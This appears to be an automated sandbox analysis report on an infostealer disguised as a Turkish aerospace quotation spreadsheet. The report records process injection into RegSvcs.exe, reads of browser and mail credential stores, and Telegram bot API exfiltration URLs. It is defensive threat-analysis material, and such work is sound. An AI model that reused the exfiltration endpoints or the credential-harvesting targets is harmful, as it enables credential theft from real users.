                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FA4B37 LoadLibraryA,GetProcAddress,0_2_00FA4B37
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_01260408 mov eax, dword ptr fs:[00000030h]0_2_01260408
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_01261A38 mov eax, dword ptr fs:[00000030h]0_2_01261A38
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_01261A98 mov eax, dword ptr fs:[00000030h]0_2_01261A98
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FF80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_00FF80A9
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FCA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FCA155
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FCA124 SetUnhandledExceptionFilter,0_2_00FCA124
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 4E4008Jump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FF87B1 LogonUserW,0_2_00FF87B1
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FA3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00FA3B3A
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FA48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00FA48D7
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_01004C27 mouse_event,0_2_01004C27
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FF7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00FF7CAF
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FF874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00FF874B
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FC862B cpuid 0_2_00FC862B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FD4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00FD4E87
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FE1E06 GetUserNameW,0_2_00FE1E06
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FD3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00FD3F3A
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FA49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00FA49A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.770000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2216, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4780, type: MEMORYSTR
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.770000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2216, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4780, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: WIN_81
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: WIN_XP
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: WIN_XPe
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: WIN_VISTA
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: WIN_7
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: WIN_8
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.770000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3940377959.000000000280C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2216, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4780, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.770000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2216, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4780, type: MEMORYSTR
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.770000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2216, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4780, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_01016283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_01016283
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_01016747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_01016747
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure2
                  Valid Accounts
                  12
                  Native API
                  1
                  DLL Side-Loading
                  1
                  Exploitation for Privilege Escalation
                  11
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault AccountsScheduled Task/Job2
                  Valid Accounts
                  1
                  DLL Side-Loading
                  11
                  Deobfuscate/Decode Files or Information
                  121
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  4
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                  Valid Accounts
                  3
                  Obfuscated Files or Information
                  Security Account Manager1
                  File and Directory Discovery
                  SMB/Windows Admin Shares1
                  Screen Capture
                  11
                  Encrypted Channel
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Access Token Manipulation
                  1
                  DLL Side-Loading
                  NTDS127
                  System Information Discovery
                  Distributed Component Object Model1
                  Email Collection
                  3
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection
                  2
                  Valid Accounts
                  LSA Secrets231
                  Security Software Discovery
                  SSH121
                  Input Capture
                  14
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials11
                  Virtualization/Sandbox Evasion
                  VNC3
                  Clipboard Data
                  Multiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                  Access Token Manipulation
                  DCSync2
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                  Process Injection
                  Proc Filesystem11
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  System Owner/User Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576047 Sample: TEKL#U0130F #U0130STE#U011e... Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 14 reallyfreegeoip.org 2->14 16 api.telegram.org 2->16 18 2 other IPs or domains 2->18 26 Found malware configuration 2->26 28 Malicious sample detected (through community Yara rule) 2->28 30 Multi AV Scanner detection for submitted file 2->30 36 11 other signatures 2->36 7 TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe 2 2->7         started        signatures3 32 Tries to detect the country of the analysis system (by using the IP) 14->32 34 Uses the Telegram API (likely for C&C communication) 16->34 process4 signatures5 38 Binary is likely a compiled AutoIt script file 7->38 40 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->40 42 Writes to foreign memory regions 7->42 44 Maps a DLL or memory area into another process 7->44 10 RegSvcs.exe 15 2 7->10         started        process6 dnsIp7 20 api.telegram.org 149.154.167.220, 443, 49727 TELEGRAMRU United Kingdom 10->20 22 checkip.dyndns.com 193.122.130.0, 49705, 49708, 49710 ORACLE-BMC-31898US United States 10->22 24 reallyfreegeoip.org 104.21.67.152, 443, 49706, 49707 CLOUDFLARENETUS United States 10->24 46 Tries to steal Mail credentials (via file / registry access) 10->46 48 Tries to harvest and steal browser information (history, passwords, etc) 10->48 signatures8

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe34%ReversingLabsWin32.Trojan.AutoitInject
                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  104.21.67.152
                  truefalse
                    high
                    api.telegram.org
                    149.154.167.220
                    truefalse
                      high
                      checkip.dyndns.com
                      193.122.130.0
                      truefalse
                        high
                        checkip.dyndns.org
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            http://checkip.dyndns.org/false
                              high
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:767668%0D%0ADate%20and%20Time:%2017/12/2024%20/%2011:29:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20767668%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.office.com/RegSvcs.exe, 00000002.00000002.3940377959.00000000028F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.orgRegSvcs.exe, 00000002.00000002.3940377959.00000000027E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://api.telegram.org/botTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.00000000027E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://chrome.google.com/webstore?hl=enHRegSvcs.exe, 00000002.00000002.3940377959.00000000028B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:767668%0D%0ADate%20aRegSvcs.exe, 00000002.00000002.3940377959.00000000027E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.office.com/lBRegSvcs.exe, 00000002.00000002.3940377959.00000000028EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.office.com/HRegSvcs.exe, 00000002.00000002.3940377959.00000000028E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.orgRegSvcs.exe, 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
